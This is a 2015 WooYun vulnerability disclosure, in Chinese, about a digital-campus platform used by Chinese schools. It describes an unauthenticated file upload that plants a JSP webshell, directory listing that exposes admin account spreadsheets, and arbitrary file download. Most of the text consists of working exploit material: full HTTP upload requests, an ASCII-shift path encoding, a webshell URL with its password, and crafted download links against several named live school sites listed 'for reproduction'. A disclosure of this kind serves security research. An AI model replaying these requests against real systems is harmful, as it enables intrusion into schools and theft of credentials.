当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107750

漏洞标题:某数字校园平台通用型漏洞打包(getshell)

相关厂商:上海释锐网络信息服务有限公司

漏洞作者: 路人甲

提交时间:2015-04-16 12:23

修复时间:2015-07-20 11:10

公开时间:2015-07-20 11:10

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-16: 细节已通知厂商并且等待厂商处理中
2015-04-21: 厂商已经确认,细节仅向厂商公开
2015-04-24: 细节向第三方安全合作伙伴开放
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

1#任意文件上传
2#目录遍历造成系统帐号泄漏
3#任意文件下载

详细说明:

上海释锐网络信息服务有限公司是中国领先的智慧教育应用解决方案供应商。我们围绕教育客户需求进行持续创新,与合作伙伴开放合作,在智慧城市、教育云应用、三通两平台、数字化校园建设和SaaS教育服务领域构筑了端到端的解决方案优势。我们致力于通过技术创新为K12中小幼学校、特教学校、职校、高校和各级各类教育主管机构提供有竞争力的智慧教育解决方案和服务,持续提升客户体验,为客户创造最大价值。目前,释锐的产品和解决方案已经应用于27个省市,服务全国3500多所学校。
1#任意文件上传
漏洞产生的原因是由于该系统的网盘功能未授权访问(如遇到管理员未开启网盘功能,下面有解决方法)
http://*/us/u_disk/ownPage.jsp
以江苏省镇江中学为例http://jszjzx.zje.net.cn

QQ截图20150413220329.png


该系统地址:

http://jszjzx.zje.net.cn/us/user/ssologin.jsp?ssourl=http%3a%2f%2fjszjzx%2ezje%2enet%2ecn%2fus%2fuser%2flogin%2ejsp%3f1%3d1&url=%2fus%2f%3f1%3d1&serverHttp=&schoolId=&proId=42-112-110-


漏洞地址:

http://jszjzx.zje.net.cn/us/u_disk/ownPage.jsp


QQ截图20150413220631.png


可以看到,该系统已经开启了网盘功能
这时候,我们只需要上传,然后抓包

QQ截图20150413220826.png


因为该网盘是给系统用户使用的,我们未授权用户没有分配使用空间
修改数据包,直接将filename后缀修改为jsp即可
当然,这里还有最重要的一步,增加userSpace的值,欺骗系统

POST http://jszjzx.zje.net.cn/us/uploadFilesServlet HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://jszjzx.zje.net.cn/us/u_disk/ownPage.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7dfcc132032a
Accept-Encoding: gzip, deflate
Host: jszjzx.zje.net.cn
Content-Length: 1108
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=552EAF7E81DC5952C219909182E0B651
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="tpId"
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="userSpace"
100
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="uploadFilePath"
65-53-87-111-99-109-96-96-105-96-111-90-96-110-94-99-106-106-103-87-110-96-109-113-96-109-87-95-96-97-92-112-103-111-87-41-87-95-96-107-103-106-116-87-112-110-41-96-92-109-87-112-110-41-114-92-109-87-97-100-103-96-110-87-112-95-100-110-102-87-44-44-45-96-50-45-93-95-95-96-43-45-45-92-45-92-50-94-46-94-95-48-44-94-50-50-95-95-94-46-52-92-87-25100-30335-38894-20043-
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="file0"; filename="160_default.jsp"
Content-Type: image/pjpeg
wooyun test
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="file2"; filename=""
Content-Type: application/octet-stream
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="Submit"

-----------------------------7dfcc132032a--


上传成功后,返回http://jszjzx.zje.net.cn/us/u_disk/ownPage.jsp,可以发现文件上传成功,但是,我找不到上传后的文件路径
但发现了一个下载链接

QQ截图20150414065406.png


这个链接中的fileName与数据包中的uploadFilePath很像

http://jszjzx.zje.net.cn/us/u_disk/download_file.jsp?fileName=65-53-87-111-99-109-96-96-105-96-111-90-96-110-94-99-106-106-103-87-110-96-109-113-96-109-87-95-96-97-92-112-103-111-87-41-87-95-96-107-103-106-116-87-112-110-41-96-92-109-87-112-110-41-114-92-109-87-97-100-103-96-110-87-112-95-100-110-102-87-44-44-45-96-50-45-93-95-95-96-43-45-45-92-45-92-50-94-46-94-95-48-44-94-50-50-95-95-94-46-52-92-87-25100-30335-38894-20043-87-44-49-43-90-95-96-97-92-112-103-111-41-101-110-107-


Content-Disposition: form-data; name="uploadFilePath"
65-53-87-111-99-109-96-96-105-96-111-90-96-110-94-99-106-106-103-87-110-96-109-113-96-109-87-95-96-97-92-112-103-111-87-41-87-95-96-107-103-106-116-87-112-110-41-96-92-109-87-112-110-41-114-92-109-87-97-100-103-96-110-87-112-95-100-110-102-87-44-44-45-96-50-45-93-95-95-96-43-45-45-92-45-92-50-94-46-94-95-48-44-94-50-50-95-95-94-46-52-92-87-25100-30335-38894-20043-


经过对uploadFilePath的猜解,我发现其值是这样的,asc值-5
例如101-110-107-
加上5之后就是106 115 112,即jpg

QQ截图20150413222657.png


所以我们可以大胆的构造uploadFilePath,通过反推uploadFilePath值,我们也可以发现系统的文件上传路径为

F:\threenet_eschool\server\default\.\deploy\us.ear\us.war\us\files\udisk\112e72bdde022a2a7c3cd51c77ddc39a\我的音乐


因为中文不好显示,所以我们将uploadFilePath修改为

POST http://jszjzx.zje.net.cn/us/uploadFilesServlet HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://jszjzx.zje.net.cn/us/u_disk/ownPage.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7dfcc132032a
Accept-Encoding: gzip, deflate
Host: jszjzx.zje.net.cn
Content-Length: 11043
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=552EAF7E81DC5952C219909182E0B651
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="tpId"
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="userSpace"
100
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="uploadFilePath"
65-53-87-111-99-109-96-96-105-96-111-90-96-110-94-99-106-106-103-87-110-96-109-113-96-109-87-95-96-97-92-112-103-111-87-41-87-95-96-107-103-106-116-87-112-110-41-96-92-109-87-112-110-41-114-92-109-87-97-100-103-96-110-87-112-95-100-110-102-87-44-44-45-96-50-45-93-95-95-96-43-45-45-92-45-92-50-94-46-94-95-48-44-94-50-50-95-95-94-46-52-92-
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="file0"; filename="160_default.jsp"
Content-Type: image/pjpeg
your code			
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="file2"; filename=""
Content-Type: application/octet-stream
-----------------------------7dfcc132032a
Content-Disposition: form-data; name="Submit"

-----------------------------7dfcc132032a--


post即可得到一句话地址:
http://jszjzx.zje.net.cn/us/files/udisk/112e72bdde022a2a7c3cd51c77ddc39a/160_default.jsp
密码:woo0yun

QQ截图20150414065818.png


QQ截图20150414070034.png


漏洞证明:

如果遇到网盘未开启的情况

QQ截图20150414070338.png


点击立即开启是不行的

QQ截图20150414070437.png


我们需要访问
http://*/us/u_disk/adminInitUdisk.jsp这个链接,
通过此处的立即开启,才有效

QQ截图20150414070537.png


该站我就不开启了
以下案例可供复现:
http://www.hmxx.pte.sh.cn/us/u_disk/ownPage.jsp
http://www.yk2z.ykedu.net/us/u_disk/ownPage.jsp
http://chzx.mhedu.sh.cn/us/u_disk/ownPage.jsp
http://www.hshsh.pudong-edu.sh.cn/us/u_disk/ownPage.jsp
http://www.wxxczx.com/us/u_disk/ownPage.jsp
http://www.hsjn.pudong-edu.sh.cn/us/u_disk/ownPage.jsp
上传方法即抓包,改个人空间大小,改文件后缀和内容,适当修改上传路径选择shell存储位置

POST http://www.hmxx.pte.sh.cn/us/uploadFilesServlet HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.hmxx.pte.sh.cn/us/diskFileServlet
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df38211aa096c
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 963
Host: www.hmxx.pte.sh.cn
Pragma: no-cache
Cookie: JSESSIONID=848D311FBE167A1D844B47F34C54C680
-----------------------------7df38211aa096c
Content-Disposition: form-data; name="tpId"
-----------------------------7df38211aa096c
Content-Disposition: form-data; name="userSpace"
100
-----------------------------7df38211aa096c
Content-Disposition: form-data; name="uploadFilePath"
65-53-87-111-99-109-96-96-105-96-111-87-110-96-109-113-96-109-87-95-96-97-92-112-103-111-87-41-87-95-96-107-103-106-116-87-112-110-41-96-92-109-87-112-110-41-114-92-109-87-97-100-103-96-110-87-112-95-100-110-102-
-----------------------------7df38211aa096c
Content-Disposition: form-data; name="file0"; filename="wooyun.jsp"
Content-Type: image/pjpeg
wooyun test
-----------------------------7df38211aa096c
Content-Disposition: form-data; name="file2"; filename=""
Content-Type: application/octet-stream
-----------------------------7df38211aa096c
Content-Disposition: form-data; name="Submit"

-----------------------------7df38211aa096c--


QQ截图20150414071208.png


http://www.hmxx.pte.sh.cn/us/files/udisk/wooyun.jsp
2#目录遍历造成系统帐号泄漏

http://*/us/files/

,在该路径下存在一个以admin_*.xls的execl文件,该文件是个包含系统帐号的导出文件,当然,系统帐号肯定有,但密码字段是否有被管理员导出,不能保证就是了,而且该文件夹存在大量文件,加载需要时间....其实只要知道了帐号,密码要么同帐号,要么就是123456
http://jszjzx.zje.net.cn/us/files/

QQ截图20150414072257.png


QQ截图20150414072349.png


QQ截图20150414072443.png


一个个找,里面有管理员的帐号和密码

QQ截图20150414072611.png


http://www.hmxx.pte.sh.cn/us/files/
http://www.yk2z.ykedu.net/us/files/
http://chzx.mhedu.sh.cn/us/files/
http://www.hshsh.pudong-edu.sh.cn/us/files/
3#任意文件下载,通过对path的猜解,asc-5,我们可以得到以下url

http://*/us/download_file.jsp?path=97-100-103-96-110-41-41-42-41-41-42-82-64-61-40-68-73-65-42-114-96-93-41-115-104-103-&fileName=114-96-93-41-115-104-103-


http://jszjzx.zje.net.cn/us/download_file.jsp?path=97-100-103-96-110-41-41-42-41-41-42-82-64-61-40-68-73-65-42-114-96-93-41-115-104-103-&fileName=114-96-93-41-115-104-103-

QQ截图20150414072142.png


QQ截图20150414072213.png


http://www.hmxx.pte.sh.cn/us/download_file.jsp?path=97-100-103-96-110-41-41-42-41-41-42-82-64-61-40-68-73-65-42-114-96-93-41-115-104-103-&fileName=114-96-93-41-115-104-103-
http://www.yk2z.ykedu.net/us/download_file.jsp?path=97-100-103-96-110-41-41-42-41-41-42-82-64-61-40-68-73-65-42-114-96-93-41-115-104-103-&fileName=114-96-93-41-115-104-103-
http://chzx.mhedu.sh.cn/us/download_file.jsp?path=97-100-103-96-110-41-41-42-41-41-42-82-64-61-40-68-73-65-42-114-96-93-41-115-104-103-&fileName=114-96-93-41-115-104-103-
http://www.hshsh.pudong-edu.sh.cn/us/download_file.jsp?path=97-100-103-96-110-41-41-42-41-41-42-82-64-61-40-68-73-65-42-114-96-93-41-115-104-103-&fileName=114-96-93-41-115-104-103-

修复方案:

上传点过滤
控制访问权限
关闭目录浏览

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-21 11:09

厂商回复:

CNVD确认所述情况,已经转由CNCERT向教育网应急组织——上海交通大学网络中心通报

最新状态:

暂无

漏洞评价:

评论